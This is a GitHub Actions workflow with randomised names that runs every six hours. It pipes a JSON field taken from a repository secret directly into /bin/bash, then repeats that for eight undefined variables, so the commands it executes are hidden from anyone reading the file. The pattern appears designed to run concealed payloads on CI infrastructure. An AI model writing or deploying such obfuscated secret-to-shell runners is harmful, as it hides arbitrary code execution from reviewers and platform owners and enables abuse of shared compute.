name: laoshirenk

on:
  workflow_dispatch:
  schedule:
    - cron: '47 1/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: laoshirenk
        env:
          kpaxc180: ${{ secrets.kpaxc180 }}
        run: |
          echo $kpaxc180 | jq -r .zj445 | /bin/bash
          echo $te9348 | jq -r .tum9746 | /bin/bash
          echo $sm5025 | jq -r .ng80518 | /bin/bash
          echo $f323 | jq -r .wc04 | /bin/bash
          echo $d57 | jq -r .uu9516 | /bin/bash
          echo $je0 | jq -r .c9627 | /bin/bash
          echo $yx42 | jq -r .kkuf370 | /bin/bash
          echo $db00204 | jq -r .azonz3542 | /bin/bash
          echo $mf74 | jq -r .fdrf951 | /bin/bash

